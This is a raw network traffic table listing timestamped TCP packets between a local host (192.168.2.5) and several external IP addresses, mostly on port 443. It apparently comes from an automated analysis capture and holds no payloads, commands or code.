Oct 13, 2023 15:21:14.036492109 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.038336992 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.038352966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.038393021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.038400888 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.038418055 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.038746119 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.040038109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.040050030 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.040111065 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.040118933 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.040159941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.041965008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.041977882 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.042037964 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.042047977 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.042088032 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.043874025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.043886900 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.043952942 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.043962002 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.044004917 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.045825005 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.045838118 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.045896053 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.045903921 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.045943975 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.047637939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.047656059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.047704935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.047712088 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.047744989 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.049457073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.049469948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.049535036 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.049544096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.049587011 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.071475983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:14.071557999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:14.156783104 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:14.156857014 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:14.195559025 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:14.197943926 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:14.352333069 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.352343082 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.352364063 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.352514029 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.352514029 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.352546930 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.352600098 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.354249954 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.354263067 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.354327917 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.354350090 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.354394913 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.356163979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.356177092 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.356235981 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.356245041 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.356285095 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.358503103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.358520985 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.358593941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.358604908 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.358647108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.360635042 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.360652924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.360712051 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.360721111 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.360806942 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.362571001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.362585068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.362637997 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.362647057 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.362689972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.365102053 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.365115881 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.365170002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.365178108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.365221024 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.367311001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.367324114 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.367388964 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.367397070 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.367439985 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.369487047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.369502068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.369574070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.369581938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.369628906 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.371186018 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.371200085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.371263027 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.371272087 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.371315956 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.372658968 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.372672081 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.373040915 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.373049974 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.373094082 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.374177933 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.374191046 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.374247074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.374255896 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.374296904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.376106977 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.376121044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.376183987 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.376193047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.376235962 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.377738953 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.377753973 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.377824068 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.377830982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.377875090 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.379465103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.379478931 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.379534006 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.379543066 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.379582882 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.381201029 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.381220102 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.381266117 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.381274939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.381315947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.382755995 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.382770061 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.382844925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.382853031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.382893085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.384593010 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.384605885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.384682894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.384691000 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.384748936 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.386059999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.386074066 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.386154890 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.386162996 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.386205912 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.387882948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.387897015 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.387962103 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.387970924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.388020039 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.389456034 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.389470100 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.389544010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.389552116 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.389595032 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.391571999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.391587019 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.391668081 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.391676903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.391721010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.393342018 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.393358946 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.393424034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.393431902 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.393472910 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.394840956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.394859076 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.394906998 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.394916058 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.394937038 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.394958019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.396711111 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.396728992 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.396769047 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.396776915 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.396814108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.396821976 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.397331953 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.398690939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.398705006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.398762941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.398772001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.398809910 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.400204897 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.400219917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.400262117 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.400269032 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.400299072 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.400312901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.402056932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.402076006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.402128935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.402137995 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.402164936 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.402177095 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.403865099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.403879881 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.403939009 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.403947115 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.403984070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.405757904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.405774117 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.405812025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.405819893 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.405848980 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.405869961 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.407352924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.407372952 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.407417059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.407424927 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.407459021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.409099102 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.409113884 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.409166098 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.409176111 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.409212112 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.410969019 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.410984993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.411035061 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.411043882 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.411062956 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.411082983 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.423296928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:14.439356089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:14.445615053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:14.445615053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:14.505398035 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:14.505585909 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:14.511096001 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:14.518271923 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:14.523555994 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:14.714281082 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.714288950 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.714308977 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.714353085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.714375973 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.714392900 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.714705944 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.715306044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.715322018 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.715370893 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.715379000 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.715421915 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.718005896 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.718020916 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.718084097 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.718091965 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.718133926 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.719863892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.719886065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.719921112 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.719929934 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.719959021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.719966888 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.721615076 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.721632004 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.721676111 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.721683979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.721712112 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.721726894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.723392963 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.723407030 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.723460913 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.723469019 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.723510027 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.725491047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.725506067 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.725563049 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.725570917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.725611925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.728698015 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.728713036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.728769064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.728776932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.728816986 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.730570078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.730590105 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.730642080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.730648994 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.730679989 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.730700970 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.732322931 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.732336998 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.732392073 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.732400894 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.732431889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.732450962 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.734087944 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.734101057 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.734158993 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.734168053 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.734214067 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.735802889 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.735817909 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.735871077 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.735879898 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.735923052 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.737471104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.737488985 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.737531900 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.737539053 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.737564087 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.737586975 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.739164114 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.739178896 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.739228010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.739236116 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.739283085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.740618944 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.740633011 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.740690947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.740698099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.740739107 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.742288113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.742306948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.742361069 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.742369890 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.742408991 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.743853092 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.743866920 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.743971109 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.743990898 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.744034052 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.746114016 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.746128082 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.746181965 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.746190071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.746238947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.748346090 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.748359919 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.748411894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.748420954 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.748464108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.749708891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.749725103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.749773979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.749782085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.749825001 CEST	49736	443	192.168.2.5	45.130.41.106
